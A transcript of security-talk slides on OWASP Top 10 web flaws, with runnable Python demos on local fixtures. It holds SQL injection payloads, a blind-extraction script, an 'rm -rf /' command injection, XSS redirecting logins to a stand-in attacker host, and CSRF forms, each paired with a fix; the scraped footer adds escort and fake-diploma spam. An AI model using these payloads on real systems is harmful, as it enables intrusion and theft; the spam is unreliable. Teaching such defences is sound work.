Hacking Your Way
To Better Security
Colin O’Dell
@colinodell
Lead Web Developer at Unleashed Technologies
PHP developer since 2002
league/commonmark maintainer
PHP 7 Upgrade Guide e-book author
php[world] 2015 CtF winner
Goals
Explore several top security vulnerabilities
from the perspective of an attacker.
1. Understand how to detect and exploit
common vulnerabilities
2. Learn how to protect against those
vulnerabilities
Disclaimers
1. NEVER test systems that aren't yours without explicit permission.
2. Examples in this talk are fictional, but the vulnerability behaviors shown are very real.
OWASP Top 10
Regular publication by The Open Web Application Security Project
Highlights the 10 most-critical web application security risks
SQL Injection
Modifying SQL statements to:
• Spoof identity
• Tamper with data
• Disclose hidden information
SQL Injection Basics

$value = $_REQUEST['value'];
$sql = "SELECT * FROM x WHERE y = '$value' ";
$database->query($sql);

Whatever the user submits lands inside the quoted string, so the query the database actually sees is:
SELECT * FROM x WHERE y = '[MALICIOUS CODE HERE]'
Logging in normally:
Username: admin
Password: password
Response: Invalid username or password. Please try again.

Adding a single quote to the password:
Username: admin
Password: password'
Response: Unknown error.
$ tail -n 1 /var/log/apache2/error.log
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "password'" at line 1.

$ tail -n 1 /var/log/mysql/query.log
SELECT * FROM users WHERE username = 'admin' AND password = 'password'';

The attacker's quote closed the string early and left the application's own closing quote dangling.
Trying a quote followed by some text:
Username: admin
Password: ' test
Response: Unknown error.
$ tail -n 1 /var/log/apache2/error.log
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "' test" at line 1.

$ tail -n 1 /var/log/mysql/query.log
SELECT * FROM users WHERE username = 'admin' AND password = '' test';
From a syntax error to a bypass

Start from the broken query and work toward one that is valid and always true:

SELECT * FROM users WHERE username = 'admin' AND password = '' test';
SELECT * FROM users WHERE username = 'admin' AND password = '';
SELECT * FROM users WHERE username = 'admin' AND password = '' OR (something that is true);
SELECT * FROM users WHERE username = 'admin' AND (true);
SELECT * FROM users WHERE username = 'admin';

Building the payload one piece at a time (the input, then the query it produces):

' test
SELECT * FROM users WHERE username = 'admin' AND password = '' test';
The first quote closes the application's string; "test" is then a syntax error.

'
SELECT * FROM users WHERE username = 'admin' AND password = '' ';
Still broken: the application's own closing quote is now unbalanced.

' '
SELECT * FROM users WHERE username = 'admin' AND password = '' ' ';
A second quote re-opens a string so the trailing quote has something to close. Valid SQL (MySQL joins the adjacent string literals, so this is password = ' '), but still false.

' OR '
SELECT * FROM users WHERE username = 'admin' AND password = '' OR ' ';
Valid SQL, but the right-hand side of the OR is a one-space string, which is not true.

' OR '1'='1
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';
Valid SQL, and '1'='1' is always true. AND binds tighter than OR, so the password check no longer matters.
Username: admin
Password: ' OR '1'='1
Response: Welcome Admin!

Admin Menu:
• Give customer money
• Take money away
• Review credit card applications
• Close accounts
Blind SQL Injection

The error text never reaches the user, but the three different responses still leak whether the injected SQL parsed and whether it matched:

Response                                          Meaning
Invalid username or password. Please try again.   Valid query (empty result)
Unknown error.                                    Invalid query
Welcome Admin!                                    Valid query (with result)
Probing for a table name

Username: admin
Password: ' AND (SELECT id FROM user LIMIT 1) = '
Response: Unknown error.

Query:
SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM user LIMIT 1) = '';
Error (server log only):
MySQL error: Unknown table 'user'.

Username: admin
Password: ' AND (SELECT id FROM users LIMIT 1) = '
Response: Invalid username or password. Please try again.

Query:
SELECT * FROM users WHERE username = 'admin' AND password = '' AND (SELECT id FROM users LIMIT 1) = '';

No error this time, so a table named users exists. The attacker never saw the error message, only the change from "Unknown error" to "Invalid username or password".
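The login bypass and the blind table-name probe above, as an added example in Python (not code from the talk, which uses PHP and MySQL). It runs against an in-memory SQLite database with a constructed users table standing in for the fictional application; the table layout, the single admin row and its password are assumptions. The last function goes beyond the talk's existence check: the same yes/no difference between responses can be used to read data one character per request.

```python
import sqlite3
import string

INVALID = "Invalid username or password. Please try again."
ERROR = "Unknown error."
WELCOME = "Welcome Admin!"


def make_db():
    """Constructed fixture for the talk's fictional login page.
    Plaintext passwords only because the talk's query compares them directly;
    a real application stores password hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'hunter2')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """The talk's concatenated query: user input becomes part of the SQL text."""
    sql = (f"SELECT * FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return ERROR  # the real error text stays in the server log
    return WELCOME if row else INVALID


def login_safe(db, username, password):
    """Same query as a parameterized statement: the driver sends the values
    separately from the SQL text, so the payloads below are just wrong passwords."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return WELCOME if row else INVALID


def table_exists(db, table):
    """The talk's blind probe: an error reply means the subquery referenced a
    table that does not exist; any other reply means it does."""
    payload = f"' AND (SELECT id FROM {table} LIMIT 1) = '"
    return login_vulnerable(db, "admin", payload) != ERROR


def extract_value(db, column, table, max_len=32):
    """Boolean-based extraction, one character per request (beyond the talk's
    existence check). The OR makes the row match exactly when the guessed
    character is right, so WELCOME vs INVALID answers each guess."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in string.ascii_lowercase + string.digits:
            payload = (f"' OR (SELECT substr({column}, {pos}, 1) "
                       f"FROM {table} LIMIT 1) = '{ch}")
            if login_vulnerable(db, "admin", payload) == WELCOME:
                found += ch
                break
        else:
            break  # nothing matched: end of the value (or a character outside the alphabet)
    return found


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin", "' OR '1'='1"))  # bypass works
    print(login_safe(db, "admin", "' OR '1'='1"))        # rejected
    print(table_exists(db, "user"), table_exists(db, "users"))
    print(extract_value(db, "password", "users"))
```

SQLite and MySQL differ in details (MySQL joins adjacent string literals, SQLite does not), but the parse-error, empty-result and matched-row responses behave the same, which is all the blind technique depends on.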
SQL Injection: Data Disclosure

http://www.onlinebookstore.com/books/123
SELECT title, author, price FROM books WHERE id = 123

$id = …;
$sql = "SELECT title, author, price
        FROM books WHERE id = " . $id;
$data = $database->query($sql);

{
  'title' => 'The Great Gatsby',
  'author' => 'F. Scott Fitzgerald',
  'price' => 9.75
}

http://www.onlinebookstore.com/books/99999
SELECT title, author, price FROM books WHERE id = 99999
{
}
No such book: empty result, nothing rendered. Note that $id is not quoted in the query, so no quote is needed to break out of it.

http://www.onlinebookstore.com/books/?????
SELECT title, author, price FROM books WHERE id = ?????
{
  'title' => '',
  'author' => '',
  'price' => 0.00
}
What the attacker is looking for: an input that makes the page render a row of the attacker's choosing.
SQL UNION Query

UNION appends the rows of a second SELECT to the rows of the first, provided both return the same number of columns:

Column 1          Column 2             Column 3
The Great Gatsby  F. Scott Fitzgerald  9.75
UNION
Foo               Bar                  123
=
The Great Gatsby  F. Scott Fitzgerald  9.75
Foo               Bar                  123

The second SELECT can read from any table the database user can see; missing columns are padded with constants:

The Great Gatsby  F. Scott Fitzgerald  9.75
UNION
(SELECT)          1                    1
=
The Great Gatsby  F. Scott Fitzgerald  9.75
(SELECT)          1                    1

And when the first SELECT matches nothing (id = 99999), only the attacker's rows come back:

(empty)
UNION
(SELECT)          1                    1
=
(SELECT)          1                    1
SQL Injection - Data Disclosure

http://www.onlinebookstore.com/books/99999 UNION SELECT number FROM creditcards

SELECT title, author, price FROM books WHERE id = 99999
UNION SELECT number FROM creditcards

{
}
One column against three: the UNION is invalid and the page stays empty.

http://www.onlinebookstore.com/books/99999 UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards

SELECT title, author, price FROM books WHERE id = 99999
UNION SELECT number AS 'title', 1 AS 'author', 1 AS 'price' FROM creditcards

$id = …;
$sql = "SELECT title, author, price
        FROM books WHERE id = " . $id;
$data = $database->query($sql);

{
  'title' => '4012-3456-7890-1234',
  'author' => 1,
  'price' => 1
}
The padded UNION has three columns, so the page renders a credit card number where a book title belongs.
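The UNION disclosure above, as an added example in Python against an in-memory SQLite database (not code from the talk). The books and creditcards tables, their rows and the fictional card number are constructed fixtures. It also shows the step the talk's "?????" slide is hinting at, guessing the column count with a UNION of NULLs, and the hardened lookup that casts the route parameter to an integer and binds it.

```python
import sqlite3

COLUMNS = ("title", "author", "price")


def make_store():
    """Constructed fixture for the talk's fictional bookstore: the books table
    the page is meant to read and a creditcards table it never should."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE books (id INTEGER PRIMARY KEY, title TEXT, author TEXT, price REAL);
        INSERT INTO books VALUES (123, 'The Great Gatsby', 'F. Scott Fitzgerald', 9.75);
        CREATE TABLE creditcards (id INTEGER PRIMARY KEY, number TEXT);
        INSERT INTO creditcards VALUES (1, '4012-3456-7890-1234');
    """)
    return db


def book_vulnerable(db, raw_id):
    """The talk's query: the route parameter is spliced in unquoted."""
    sql = "SELECT title, author, price FROM books WHERE id = " + raw_id
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return []  # e.g. a UNION with the wrong column count: blank page
    return [dict(zip(COLUMNS, row)) for row in rows]


def find_column_count(db, max_cols=8):
    """Attacker side: the first UNION of NULLs that makes a (blank) row appear
    has the width of the original SELECT."""
    for n in range(1, max_cols + 1):
        payload = "99999 UNION SELECT " + ", ".join(["NULL"] * n)
        if book_vulnerable(db, payload):
            return n
    return None


def book_safe(db, raw_id):
    """Two independent defences: the ID must parse as an integer, and it is
    bound as a parameter instead of being concatenated into the SQL."""
    try:
        book_id = int(raw_id)
    except ValueError:
        return []
    rows = db.execute(
        "SELECT title, author, price FROM books WHERE id = ?", (book_id,)
    ).fetchall()
    return [dict(zip(COLUMNS, row)) for row in rows]


if __name__ == "__main__":
    db = make_store()
    print(book_vulnerable(db, "123"))
    print(book_vulnerable(db, "99999 UNION SELECT number FROM creditcards"))  # []
    print(find_column_count(db))  # 3
    print(book_vulnerable(db, "99999 UNION SELECT number, 1, 1 FROM creditcards"))
    print(book_safe(db, "99999 UNION SELECT number, 1, 1 FROM creditcards"))  # []
```

The column aliases in the talk's payload are optional: with UNION the result takes its column names from the first SELECT, so padding with bare constants is enough.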
$val = $_REQUEST['value'];
$sql = "SELECT * FROM x WHERE y = '$val' ";
$database->query($sql);
Protecting Against SQL Injection

1. Block input with special characters
Not enough on its own: quotes are legitimate in real data (O'Dell), and a quote is not needed at all where the value is unquoted in the query (WHERE id = $id).

2. Escape user input

$value = $_REQUEST['value'];
$escaped = mysqli_real_escape_string($mysqli, $value);
$sql = "SELECT * FROM x WHERE y = '$escaped' ";
$database->query($sql);

Input:            ' OR '1' = '1
After escaping:   \' OR \'1\' = \'1
Resulting query:  SELECT * FROM x WHERE y = '\' OR \'1\' = \'1'

The escaped quotes stay inside the string literal, so the OR never reaches the parser. This only protects values that are placed inside quotes; it does nothing for the unquoted numeric case above.

3. Use prepared statements

$mysqli = new mysqli("localhost", "user", "pass", "db");
$q = $mysqli->prepare("SELECT * FROM x WHERE y = ?");
$value = $_REQUEST['value'];
$q->bind_param("s", $value);
$q->execute();

The placeholder is not quoted: the driver sends the value separately from the SQL text, so it can never be parsed as SQL.

Native PHP:
● mysqli
● pdo_mysql
Frameworks / Libraries:
● Doctrine
● Eloquent
● Zend_Db
Other Types of Injection

The same pattern applies wherever user input is concatenated into something another parser will interpret:
• NoSQL databases
• OS Commands
• LDAP Queries
• SMTP Headers

$file = $_GET['filename'];
shell_exec("rm uploads/{$file}");

/rm.php?filename=foo.jpg+%26%26+rm+-rf+%2F
decodes to:
rm uploads/foo.jpg && rm -rf /
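The command injection above, as an added example in Python (not code from the talk). The vulnerable version hands the file name to a shell the way shell_exec() does; the hardened version passes argv as a list, so no shell parses it, and additionally rejects anything that is not a bare file name. The talk's rm -rf / is replaced with a harmless marker file so the example can be run; the uploads directory is created in a temporary location.

```python
import os
import subprocess
import tempfile


def delete_upload_vulnerable(root, filename):
    """Equivalent of shell_exec("rm uploads/{$file}"): the name is pasted into
    a command line that a shell interprets, metacharacters included."""
    subprocess.run(f"rm uploads/{filename}", shell=True, cwd=root, check=False)


def delete_upload_safe(root, filename):
    """No shell: argv is a list, so the whole value is one file name argument.
    The name must also be a bare name (no path separators, no '..'), which
    closes path traversal as well. Returns True if a file was removed."""
    if filename != os.path.basename(filename) or filename in ("", ".", ".."):
        return False
    result = subprocess.run(["rm", "--", os.path.join("uploads", filename)],
                            cwd=root, check=False, stderr=subprocess.DEVNULL)
    return result.returncode == 0


def run_delete(vulnerable, filename):
    """Runs one delete in a throwaway directory holding uploads/foo.jpg.
    Returns (foo_jpg_deleted, injected_command_ran)."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "uploads"))
        open(os.path.join(root, "uploads", "foo.jpg"), "w").close()
        if vulnerable:
            delete_upload_vulnerable(root, filename)
        else:
            delete_upload_safe(root, filename)
        return (not os.path.exists(os.path.join(root, "uploads", "foo.jpg")),
                os.path.exists(os.path.join(root, "INJECTED")))


# The talk's payload, URL-decoded, with 'rm -rf /' swapped for a marker file.
PAYLOAD = "foo.jpg && touch INJECTED"

if __name__ == "__main__":
    print(run_delete(True, PAYLOAD))     # (True, True): the injected command ran
    print(run_delete(False, PAYLOAD))    # (False, False): one odd file name, nothing ran
    print(run_delete(False, "foo.jpg"))  # (True, False)
```

With the list form the string "foo.jpg && touch INJECTED" is a single argument to rm, which simply reports that no such file exists. Avoiding the shell is the fix; the name check is the extra layer that also stops ../ traversal out of the uploads directory.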
XSS – Cross-Site Scripting
Injecting code into the webpage (for other users)
• Execute malicious scripts
• Hijack sessions
• Install malware
• Deface websites
XSS Attack Basics

The value being printed can come from any source the application trusts too much, not just the current request:

$value = $_POST['value'];
$value = $rssFeed->first->title;
$value = db_fetch('SELECT x FROM table');
<?php echo $value ?>

Raw code/script is injected onto the page.
XSS – Cross-Site Scripting Basics
Snipicons by Snip Master licensed under CC BY-NC 3.0.
Cookie icon by Daniele De Santis licensed under CC BY 3.0.
Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png
Logos are copyright of their respective owners.
<form id="evilform"
      action="https://facebook.com/password.php"
      method="post">
  <input type="password" name="password" value="hacked123">
</form>
<script>
  document.getElementById('evilform').submit();
</script>
XSS – Cross-Site Scripting: short.ly

short.ly is a fictional URL shortener. Paste a URL, click Shorten, and the site shows the short link and the original URL, then redirects anyone who visits the short link:

Paste a URL here                         [Shorten]
http://www.colinodell.com                [Shorten]
Short URL: http://short.ly/b7fe9
Original URL: http://www.colinodell.com
Please wait while we redirect you to http://www.colinodell.com

The "URL" is echoed into the page unescaped, so it does not have to be a URL:

<script>alert('hello world!');</script>  [Shorten]
Short URL: http://short.ly/3bs8a
Original URL:
(alert box: hello world!)

The page source shows why:

<p>
  Short URL:
  <a href="…">http://short.ly/3bs8a</a>
</p>
<p>
  Original URL:
  <a href="…"><script>alert('hello world!');</script></a>
</p>

Anything else can be injected the same way, and it runs for every visitor of the short link:

<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ">  [Shorten]
Short URL: http://short.ly/3bs8a
Original URL: (the embedded video renders here, and again on the redirect page)

Or something quieter, such as rewriting where the page's own login form posts to:

document.getElementById('login-form').action =
  'http://malicious-site.com/steal-passwords.php';
Protecting Against XSS Attacks

$value = $_POST['value'];
$value = db_fetch('SELECT value FROM table');
$value = $rssFeed->first->title;
<?php echo $value ?>

• Filter user input

$value = strip_tags($_POST['value']);
$value = strip_tags(
  db_fetch('SELECT value FROM table')
);
$value = strip_tags($rssFeed->first->title);
<?php echo $value ?>

Filtering removes tags, but not everything that is dangerous in a given context: a quote inside an attribute value, or a javascript: URL in an href, contain no tags at all. Not enough on its own.

• Escape user input

$value = htmlspecialchars($_POST['value']);
$value = htmlspecialchars(
  db_fetch('SELECT value FROM table')
);
$value = htmlspecialchars($rssFeed->first->title);
<?php echo $value ?>

<script>  →  &lt;script&gt;
htmlspecialchars()

Escaping at input time stores the value already encoded, which only suits the one context it was encoded for (HTML, but not a JSON response or an e-mail built from the same value later). Pass ENT_QUOTES so single-quoted attributes are covered too; PHP 8.1 made that the default.

• Escape output

$value = $_POST['value'];
$value = db_fetch('SELECT value FROM table');
$value = $rssFeed->first->title;
<?php echo htmlspecialchars($value) ?>

Escape at the point of output, for the context it is written into. Template engines such as Twig do this by default:

{{ some_variable }}        escaped automatically
{{ some_variable|raw }}    not escaped; only for content already known to be safe HTML
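The short.ly result page, vulnerable and hardened, as an added example in Python (not code from the talk, which is PHP). strip_tags() is stood in for by a small regex with the same behaviour on these inputs; html.escape() with quote=True plays the role of htmlspecialchars() with ENT_QUOTES. The URL validation goes one step beyond the talk: because the value is also used as an href and a redirect target, escaping alone is not sufficient, and the scheme has to be checked as well.

```python
import html
import re
from urllib.parse import urlsplit


def strip_tags(value):
    """Stand-in for PHP's strip_tags(): removes anything that looks like a tag."""
    return re.sub(r"<[^>]*>", "", value)


def render_vulnerable(short_url, original_url):
    """<?php echo $value ?> with no escaping: the submitted value is written
    into an attribute and into text exactly as typed."""
    return (f'<p>Short URL: <a href="{short_url}">{short_url}</a></p>\n'
            f'<p>Original URL: <a href="{original_url}">{original_url}</a></p>')


def is_allowed_url(value):
    """Context-specific check: a value used as an href (and as a redirect
    target) must be an absolute http(s) URL. Escaping cannot make a
    javascript: URL safe, only rejecting it can."""
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def render_safe(short_url, original_url):
    """Validate the URL, then escape at output time for the HTML context."""
    if not is_allowed_url(original_url):
        raise ValueError("only absolute http(s) URLs can be shortened")

    def esc(s):
        return html.escape(s, quote=True)  # htmlspecialchars() with ENT_QUOTES

    return (f'<p>Short URL: <a href="{esc(short_url)}">{esc(short_url)}</a></p>\n'
            f'<p>Original URL: <a href="{esc(original_url)}">{esc(original_url)}</a></p>')


if __name__ == "__main__":
    # Constructed payloads: the talk's script tag, and an attribute break-out
    # that strip_tags() leaves untouched because it contains no tag.
    print(render_vulnerable("http://short.ly/3bs8a", "<script>alert('hello world!');</script>"))
    attr = 'http://example.com/" onmouseover="alert(1)'
    print(render_vulnerable("http://short.ly/x", strip_tags(attr)))  # still injectable
    print(render_safe("http://short.ly/x", attr))                     # quotes become &quot;
```

The second payload is the case the "filter user input" slide misses: it passes a tag filter unchanged and still breaks out of the href attribute, while output escaping turns each quote into &quot; and the URL check rejects the script-tag payload outright.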
CSRF – Cross-Site Request Forgery
Execute unwanted actions on another site which the user is logged in to.
• Change password
• Transfer funds
• Anything the user can do
CSRF – Cross-Site Request Forgery

The browser sends a site's session cookie with every request to that site, whichever page triggered the request:

User → Facebook: Hi Facebook! I am colinodell and my password is *****.
Facebook → User: Welcome Colin! Here's your news feed.

User → other website: Hi other website! Show me your homepage.
Other website → User: Sure, here you go!
The other website's page contains a form aimed at the victim site, submitted automatically by script:

<form id="evilform"
      action="https://facebook.com/password.php"
      method="post">
  <input type="password" name="password" value="hacked123">
</form>
<script>
  document.getElementById('evilform').submit();
</script>

Other website → victim's browser: Tell Facebook we want to change our password to hacked123.
Victim's browser → Facebook: Hi Facebook! Please change my password to hacked123.
Facebook → victim's browser: Done!

The forged request carries the victim's session cookie, so Facebook cannot tell it from one the user made deliberately.
CSRF – Cross-Site Request Forgery: short.ly again

<img src="https://paypal.com/pay?email=me@evil.com&amt=9999">  [Shorten]
Please wait while we redirect you to
(the "image" never renders, but every visitor's browser has already made the request, with their own cookies attached)
Protecting Against CSRF Attacks

Use randomized CSRF tokens

<input type="hidden" name="token" value="ao3i4yw90sae8rhsdrf">

1. Generate a random string per user.
2. Store it in their session.
3. Add to form as hidden field.
4. Compare submitted value to session:
   a. Same token? Proceed.
   b. Different/missing? Reject the request.
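The four steps above, as an added example in Python (not code from the talk). The session is a plain dict standing in for the PHP session, the form handler returns an HTTP status code instead of rendering a page, and the token comparison is done in constant time. The forged request is the talk's evilform, which cannot carry the token because a page on another origin cannot read it.

```python
import hmac
import secrets


def csrf_token(session):
    """Steps 1 and 2: one random token per session, generated on first use
    and kept server-side."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def render_password_form(session):
    """Step 3: the token rides along as a hidden field."""
    return ('<form action="/password.php" method="post">\n'
            f'  <input type="hidden" name="token" value="{csrf_token(session)}">\n'
            '  <input type="password" name="password">\n'
            '</form>')


def change_password(session, form):
    """Step 4: compare the submitted token with the session's, in constant
    time. Returns 403 for a missing or wrong token, 200 otherwise."""
    expected = session.get("csrf_token")
    submitted = form.get("token", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return 403
    session["password"] = form.get("password", "")  # stands in for the real change
    return 200


def simulate():
    """Legitimate submission, then the talk's evilform (no token), then a
    guessed token. Returns the three status codes."""
    session = {"password": "original"}
    render_password_form(session)
    legit = change_password(session, {"token": session["csrf_token"], "password": "new-pass"})
    forged = change_password(session, {"password": "hacked123"})
    guessed = change_password(session, {"token": "ao3i4yw90sae8rhsdrf", "password": "hacked123"})
    return legit, forged, guessed


if __name__ == "__main__":
    print(simulate())  # (200, 403, 403)
```

The token must be unpredictable (secrets, not a timestamp or a counter) and tied to the session; the constant-time comparison keeps a wrong guess from leaking how many leading characters matched.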
Insecure Direct Object References
Access & manipulate objects you shouldn't have access to

(screenshot demo; images not in the transcript)
Protecting Against Insecure Direct Object References

Check permission on data input
• URL / route parameters
• Form field inputs
• Basically anything that's an ID
• If they don't have permission, show a 403 (or 404) page

Check permission on data output
• Do they have permission to access this object?
• Do they have permission to even know this exists?
• This is not "security through obscurity"
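The two checks above, as an added example in Python (not code from the talk). The account table is constructed. The point the second check makes is visible in the probe at the end: when "not yours" and "does not exist" get the same 404, an attacker iterating over IDs learns nothing about which accounts exist.

```python
# Constructed data: account id -> owner and balance.
ACCOUNTS = {
    1001: {"owner": "alice", "balance": 120.00},
    1002: {"owner": "bob", "balance": 4500.00},
}


def account_vulnerable(current_user, raw_id):
    """The ID from the URL is looked up directly: any logged-in user can read
    (and, written the same way, modify) any account by changing the number."""
    try:
        account = ACCOUNTS.get(int(raw_id))
    except ValueError:
        return (404, None)
    return (200, account) if account else (404, None)


def account_checked(current_user, raw_id):
    """Permission is checked on the input ID, and an account that belongs to
    someone else gets the same 404 as one that does not exist, so the ID
    cannot be used to find out which accounts exist."""
    try:
        account_id = int(raw_id)
    except ValueError:
        return (404, None)
    account = ACCOUNTS.get(account_id)
    if account is None or account["owner"] != current_user:
        return (404, None)
    return (200, account)


def probe(handler, current_user, id_range):
    """Attacker side: which IDs answer with something other than 404."""
    return [i for i in id_range if handler(current_user, str(i))[0] != 404]


if __name__ == "__main__":
    print(probe(account_vulnerable, "alice", range(1000, 1005)))  # [1001, 1002]
    print(probe(account_checked, "alice", range(1000, 1005)))     # [1001]
```

Returning 403 for someone else's account would also block the read, but it would confirm the account exists; the same response for both cases is what closes the enumeration.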
Sensitive Data Exposure, Security Misconfiguration, Components with Known Vulnerabilities

Sensitive Data Exposure

Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption)
• Customer information
• Credit card numbers
• Credentials

Things to look for on a site you are assessing (with permission): files that hand over version numbers, credentials or the whole source history when left reachable under the web root.
http://www.example.com/CHANGELOG
http://www.example.com/composer.lock
http://www.example.com/.git/
http://www.example.com/.env
http://www.example.com/robots.txt
(screenshots of each not in the transcript)
Security Misconfiguration & Components with Known Vulnerabilities

Default accounts enabled; weak passwords
• admin / admin
Security configuration
• Does SSH grant root access?
• Are weak encryption keys used?
Out-of-date software
• Old versions with known issues
• Are the versions exposed?
• Unused software running (DROWN attack)
Protecting Against Sensitive Data Exposure, Security Misconfiguration, and Components with Known Vulnerabilities

Keep software up-to-date
• Install critical updates immediately
• Install other updates regularly

Keep sensitive data out of web root
• Files which provide version numbers
  • README, CHANGELOG, .git, composer.lock
• Database credentials & API keys
• Encryption keys

Use strong encryption
• Encrypt with a strong private key
• Encrypt backups and data-in-transit
• Use strong hashing techniques for passwords (password_hash() in PHP)

Test your systems
• Scan your systems with automated tools
• Test critical components yourself
  • Automated tests
  • Manual tests
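A pre-deploy check for the "keep sensitive data out of web root" point, as an added example in Python (not a tool from the talk). It walks a document root and reports the files and directories the talk lists as giveaways; the file-name list and the constructed directory layout in the demo are assumptions, and the list is meant to be extended for whatever else a project keeps next to its code.

```python
import os
import tempfile

# Names the talk lists as giveaways (version numbers, credentials, whole
# source history) when reachable under the document root. Extend as needed.
EXPOSED_FILES = {"README", "README.md", "CHANGELOG", "CHANGELOG.md",
                 "composer.lock", ".env"}
EXPOSED_DIRS = {".git"}


def find_exposed(webroot):
    """Return the webroot-relative paths of sensitive files and directories
    found anywhere under webroot, sorted."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(webroot):
        for name in list(dirnames):
            if name in EXPOSED_DIRS:
                hits.append(os.path.relpath(os.path.join(dirpath, name), webroot))
                dirnames.remove(name)  # report the directory once, do not descend
        for name in filenames:
            if name in EXPOSED_FILES:
                hits.append(os.path.relpath(os.path.join(dirpath, name), webroot))
    return sorted(hits)


def demo():
    """Constructed layout: a project with public/ as the document root, where
    a .git checkout, composer.lock and a .env have ended up inside public/,
    plus a CHANGELOG shipped by a vendored package. The .env one level up,
    outside the web root, is where it belongs and is not reported."""
    with tempfile.TemporaryDirectory() as root:
        web = os.path.join(root, "public")
        os.makedirs(os.path.join(web, ".git"))
        os.makedirs(os.path.join(web, "vendor", "acme"))
        for rel in ("composer.lock", ".env", "index.php",
                    os.path.join("vendor", "acme", "CHANGELOG")):
            open(os.path.join(web, rel), "w").close()
        open(os.path.join(root, ".env"), "w").close()
        return find_exposed(web)


if __name__ == "__main__":
    for path in demo():
        print("exposed:", path)
```

Run it against the directory the web server actually serves (the project's public/ directory, or the project root if the server was pointed there by mistake), ideally as a step in the deployment pipeline so a stray .git or .env fails the deploy rather than going live.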
Next Steps
Test your own applications for vulnerabilities
Learn more about security & ethical hacking
Enter security competitions (like CtF)
Stay informed
Questions?
Thanks!
Slides & feedback: https://joind.in/17622
Colin O'Dell
@colinodell

Debugging Effectively - PHP UK 2017Debugging Effectively - PHP UK 2017
Debugging Effectively - PHP UK 2017
 
Debugging Effectively - SunshinePHP 2017
Debugging Effectively - SunshinePHP 2017Debugging Effectively - SunshinePHP 2017
Debugging Effectively - SunshinePHP 2017
 
Automating Your Workflow with Gulp.js - php[world] 2016
Automating Your Workflow with Gulp.js - php[world] 2016Automating Your Workflow with Gulp.js - php[world] 2016
Automating Your Workflow with Gulp.js - php[world] 2016
 
Rise of the Machines: PHP and IoT - php[world] 2016
Rise of the Machines: PHP and IoT - php[world] 2016Rise of the Machines: PHP and IoT - php[world] 2016
Rise of the Machines: PHP and IoT - php[world] 2016
 
Debugging Effectively - ZendCon 2016
Debugging Effectively - ZendCon 2016Debugging Effectively - ZendCon 2016
Debugging Effectively - ZendCon 2016
 
Debugging Effectively - DrupalCon Europe 2016
Debugging Effectively - DrupalCon Europe 2016Debugging Effectively - DrupalCon Europe 2016
Debugging Effectively - DrupalCon Europe 2016
 
CommonMark: Markdown done right - Nomad PHP September 2016
CommonMark: Markdown done right - Nomad PHP September 2016CommonMark: Markdown done right - Nomad PHP September 2016
CommonMark: Markdown done right - Nomad PHP September 2016
 
Debugging Effectively - Frederick Web Tech 9/6/16
Debugging Effectively - Frederick Web Tech 9/6/16Debugging Effectively - Frederick Web Tech 9/6/16
Debugging Effectively - Frederick Web Tech 9/6/16
 
Debugging Effectively
Debugging EffectivelyDebugging Effectively
Debugging Effectively
 
CommonMark: Markdown Done Right
CommonMark: Markdown Done RightCommonMark: Markdown Done Right
CommonMark: Markdown Done Right
 

Dernier

一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样ayvbos
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsMonica Sydney
 
一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书一比一原版贝德福特大学毕业证学位证书
一比一原版贝德福特大学毕业证学位证书F
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...kajalverma014
 
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni  9332606886 HOT & SEXY Models beautiful and charmin...Local Call Girls in Seoni  9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...kumargunjan9515
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查ydyuyu
 
Mira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsMira Road Housewife Call Girls 07506202331, Nalasopara Call Girls
Mira Road Housewife Call Girls 07506202331, Nalasopara Call GirlsPriya Reddy
 
